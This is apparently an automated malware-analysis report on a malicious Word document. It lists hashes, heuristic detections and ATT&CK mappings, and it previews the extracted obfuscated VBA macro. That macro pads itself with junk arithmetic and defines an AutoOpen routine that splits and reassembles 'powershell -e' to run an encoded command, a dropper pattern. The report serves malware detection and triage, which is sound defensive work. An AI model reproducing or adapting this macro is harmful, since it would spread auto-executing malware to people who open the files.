Office (OLE) malware analysis — malicious · 1da577cc36113f34

MALICIOUS

Office (OLE)

252.4 KB Created: 2019-03-14 06:50:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: efa88d9f4746fda26d94ea3a7dd4289b SHA-1: eb0324b8f52a65ddcbf98acf0047be2602f03d8c SHA-256: 1da577cc36113f342fb1d47d9f75056ca7792c1cc40aa38be150f4554c0cdf65

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate the presence of an AutoOpen macro that uses GetObject and attempts to reassemble API names like 'Win32_Process', strongly suggesting an intent to execute code. The macro's complexity and obfuscation point towards a downloader or dropper functionality, likely initiating further malicious activity.

Heuristics 8

ClamAV: Doc.Malware.00536d-6894470-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6894470-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 67078 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	67078 bytes
SHA-256: `9055e867a1de8fddbddb130c5a3c6053270f0e5e994dc5ee11ff7b05490a81f5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZcB1BAx" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function jAwoACUk() If KBX4x_ = bcZUAD Then SAQGAZAA = 251495408 * tCQcBA fxAAXxcX = fUkxZk1 - 773187183 + 171917073 + jBDCAQAA * 997993050 / 933254988 + 238240702 / Chr(266518125 / CSng(521044337 + Round(vUDGA1ow))) + 636867536 * Log(sAGGAc) - 395885097 - 129980176 + EcB_AA1 * CLng(X4cAXoU - Atn(UAAUBAG / 812800627 / 66024360 + MoUk_A)) KxB4QAA = 432346466 * ZAUZAAkD End If If Y1ZA4A = nXGAAAA Then KAAACwc = 726806180 * iQABQ4DA GBB_A1 = JAGAAwA - 662128201 + 756629855 + EQAZkAA * 133594769 / 360661186 + 923123443 / Chr(565201370 / CSng(241582482 + Round(TAABDBA1))) + 496679324 * Log(L4AUAkB) - 632817401 - 724585995 + LDAUAXB * CLng(aZwDoAA - Atn(tQADAA_4 / 736884531 / 312375886 + fA1BkBAC)) kCCBUDU = 505611138 * XABAZo End If If pCXCGCc = SQQkACUC Then ZZAQ_A = 794610314 * CUcA4c lADDDU4 = EGAwck - 554177396 + 112952478 + wUAAo1 * 882426766 / 6555115 + 460006087 / Chr(355666877 / CSng(540808697 + Round(oZcAXc))) + 410508735 * Log(EAwkXA) - 57843043 - 296043713 + ICUAcU * CLng(KUADZAQG - Atn(KUAxAA / 327912337 / 288101918 + FcCAAUQA)) wZUAwDD = 985382277 * iQXADA End If If wA_BU_ = qAZBABA4 Then QAAD_Xw = 543965888 * CBBXUUA tAoUDB = j1QAAAB_ - 966514009 + 178696511 + NDBADB * 983338421 / 349882712 + 313401595 / Chr(439288671 / CSng(520297826 + Round(WA4ACAQ))) + 275219720 * Log(NZ1AUxU) - 435929066 - 211429438 + vZoA4wB * CLng(MQkQoXC - Atn(WAABB4 / 945765656 / 788573318 + S4x1BxQ)) ADQGAo1Z = 370238960 * MAGAQQ1A End If If NUD4BkU = QGAAUBAA Then qA4Q_UC = 605618704 * iZDwAAAA R4_X_Xo = RAAAQQA - 655971098 + 846073621 + jQZcAB1B * 999151246 / 505425657 + 236301192 / Chr(847768466 / CSng(219216551 + Round(LAAA1B))) + 650038052 * Log(fUBBGAA) - 484466031 - 5270120 + pDZAAoA1 * CLng(VA1DAU - Atn(jAc_ADoc / 448687618 / 863245306 + nBXBDk)) WUQDxZX = 346602123 * SQxUUCA End If If LAADAk4D = LBAAUXUA Then AAADGB = 795559071 * wx4kAAQ4 RDAA_AB = LAG_ADC - 159202071 + 580481539 + SAGwQQAU * 186189777 / 568384319 + 176846293 / Chr(593312438 / CSng(196091035 + Round(LGAGADA))) + 209655130 * Log(PQGQXc) - 958684800 - 252248519 + AUDBUU * CLng(AAk_AAk - Atn(u44QkCk_ / 217049160 / 963482977 + dwAUAGA4)) CwAXGcBk = 427523637 * NAGoGoAc End If If wQXZCAQ1 = vCABABw Then NAQxBADA = 954784072 * p4AAAC FAGoZoC = TxQCCA4Q - 427175429 + 491237292 + f44BBA * 320815324 / 783421636 + 126084156 / Chr(107924729 / CSng(323466373 + Round(SA4DAAAB))) + 456472900 * Log(zAoXB41_) - 969139960 - 424638556 + D1AA4QQA * CLng(KBkxXUAc - Atn(IGAQCA / 215086849 / 529055136 + AAB_QAUk)) kAwAk1 = 56897608 * wkcwDGU End If End Function Sub autoopen() On Error Resume Next If IxAxcx = zwAoAAA Then rAQUxc = 152816794 * BAxAZQA pUABAA1 = jQcAcAZ - 324799790 + 448746078 + IA1AZc * 917290361 / 514165029 + 46799271 / Chr(723111709 / CSng(898833146 + Round(aAZcxxXU))) + 63868050 * Log(IQDDwUX) - 83665627 - 738517047 + nDcAAU * CLng(wQAAAA1Z - Atn(LoDUAoc / 604209687 / 560637849 + cAcAAoA)) zQ4AUUkA = 227494141 * uoAQQAAA End If If QkUZBAA = jQAAAAAc Then wAD4C_A = 506701640 * GxGA4UQ JAAQxA = uAAAAC - 147516368 + 285171672 + aAACAUA4 * 657785855 / 864470680 + 726541387 / Chr(434397226 / CSng(935619607 + Round(mowAZDQA))) + 399704516 * Log(iG1DQA) - 368291624 - 431616580 + LAQQBAA * CLng(YUAADD - Atn(m4U4AX / 641182243 / 814290178 + iADAZ4)) jUQGCAQ = 73733816 * cAXx4UAB End If FkAQkGBQ (sZAUCDw + "po" + tZAZAAA + "wersh" + oADQDA + "ell -e " + PkBAA1Z + AAAAAQAU + awUAAA + uADxw_C + Z4AAAAB + EAQoBAA + sA4AAQ + zkoAxo) If skAAwk = mxABoXB Then QB_kC4Q = 913896144 ... (truncated)

SHA-256: 9055e867a1de8fddbddb130c5a3c6053270f0e5e994dc5ee11ff7b05490a81f5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZcB1BAx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jAwoACUk()
   If KBX4x_ = bcZUAD Then
         SAQGAZAA = 251495408 * tCQcBA
         fxAAXxcX = fUkxZk1 - 773187183 + 171917073 + jBDCAQAA * 997993050 / 933254988 + 238240702 / Chr(266518125 / CSng(521044337 + Round(vUDGA1ow))) + 636867536 * Log(sAGGAc) - 395885097 - 129980176 + EcB_AA1 * CLng(X4cAXoU - Atn(UAAUBAG / 812800627 / 66024360 + MoUk_A))
         KxB4QAA = 432346466 * ZAUZAAkD
End If
   If Y1ZA4A = nXGAAAA Then
         KAAACwc = 726806180 * iQABQ4DA
         GBB_A1 = JAGAAwA - 662128201 + 756629855 + EQAZkAA * 133594769 / 360661186 + 923123443 / Chr(565201370 / CSng(241582482 + Round(TAABDBA1))) + 496679324 * Log(L4AUAkB) - 632817401 - 724585995 + LDAUAXB * CLng(aZwDoAA - Atn(tQADAA_4 / 736884531 / 312375886 + fA1BkBAC))
         kCCBUDU = 505611138 * XABAZo
End If
   If pCXCGCc = SQQkACUC Then
         ZZAQ_A = 794610314 * CUcA4c
         lADDDU4 = EGAwck - 554177396 + 112952478 + wUAAo1 * 882426766 / 6555115 + 460006087 / Chr(355666877 / CSng(540808697 + Round(oZcAXc))) + 410508735 * Log(EAwkXA) - 57843043 - 296043713 + ICUAcU * CLng(KUADZAQG - Atn(KUAxAA / 327912337 / 288101918 + FcCAAUQA))
         wZUAwDD = 985382277 * iQXADA
End If
   If wA_BU_ = qAZBABA4 Then
         QAAD_Xw = 543965888 * CBBXUUA
         tAoUDB = j1QAAAB_ - 966514009 + 178696511 + NDBADB * 983338421 / 349882712 + 313401595 / Chr(439288671 / CSng(520297826 + Round(WA4ACAQ))) + 275219720 * Log(NZ1AUxU) - 435929066 - 211429438 + vZoA4wB * CLng(MQkQoXC - Atn(WAABB4 / 945765656 / 788573318 + S4x1BxQ))
         ADQGAo1Z = 370238960 * MAGAQQ1A
End If
   If NUD4BkU = QGAAUBAA Then
         qA4Q_UC = 605618704 * iZDwAAAA
         R4_X_Xo = RAAAQQA - 655971098 + 846073621 + jQZcAB1B * 999151246 / 505425657 + 236301192 / Chr(847768466 / CSng(219216551 + Round(LAAA1B))) + 650038052 * Log(fUBBGAA) - 484466031 - 5270120 + pDZAAoA1 * CLng(VA1DAU - Atn(jAc_ADoc / 448687618 / 863245306 + nBXBDk))
         WUQDxZX = 346602123 * SQxUUCA
End If
   If LAADAk4D = LBAAUXUA Then
         AAADGB = 795559071 * wx4kAAQ4
         RDAA_AB = LAG_ADC - 159202071 + 580481539 + SAGwQQAU * 186189777 / 568384319 + 176846293 / Chr(593312438 / CSng(196091035 + Round(LGAGADA))) + 209655130 * Log(PQGQXc) - 958684800 - 252248519 + AUDBUU * CLng(AAk_AAk - Atn(u44QkCk_ / 217049160 / 963482977 + dwAUAGA4))
         CwAXGcBk = 427523637 * NAGoGoAc
End If
   If wQXZCAQ1 = vCABABw Then
         NAQxBADA = 954784072 * p4AAAC
         FAGoZoC = TxQCCA4Q - 427175429 + 491237292 + f44BBA * 320815324 / 783421636 + 126084156 / Chr(107924729 / CSng(323466373 + Round(SA4DAAAB))) + 456472900 * Log(zAoXB41_) - 969139960 - 424638556 + D1AA4QQA * CLng(KBkxXUAc - Atn(IGAQCA / 215086849 / 529055136 + AAB_QAUk))
         kAwAk1 = 56897608 * wkcwDGU
End If
End Function
Sub autoopen()
On Error Resume Next
   If IxAxcx = zwAoAAA Then
         rAQUxc = 152816794 * BAxAZQA
         pUABAA1 = jQcAcAZ - 324799790 + 448746078 + IA1AZc * 917290361 / 514165029 + 46799271 / Chr(723111709 / CSng(898833146 + Round(aAZcxxXU))) + 63868050 * Log(IQDDwUX) - 83665627 - 738517047 + nDcAAU * CLng(wQAAAA1Z - Atn(LoDUAoc / 604209687 / 560637849 + cAcAAoA))
         zQ4AUUkA = 227494141 * uoAQQAAA
End If
   If QkUZBAA = jQAAAAAc Then
         wAD4C_A = 506701640 * GxGA4UQ
         JAAQxA = uAAAAC - 147516368 + 285171672 + aAACAUA4 * 657785855 / 864470680 + 726541387 / Chr(434397226 / CSng(935619607 + Round(mowAZDQA))) + 399704516 * Log(iG1DQA) - 368291624 - 431616580 + LAQQBAA * CLng(YUAADD - Atn(m4U4AX / 641182243 / 814290178 + iADAZ4))
         jUQGCAQ = 73733816 * cAXx4UAB
End If
FkAQkGBQ (sZAUCDw + "po" + tZAZAAA + "wersh" + oADQDA + "ell -e " + PkBAA1Z + AAAAAQAU + awUAAA + uADxw_C + Z4AAAAB + EAQoBAA + sA4AAQ + zkoAxo)
   If skAAwk = mxABoXB Then
         QB_kC4Q = 913896144 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.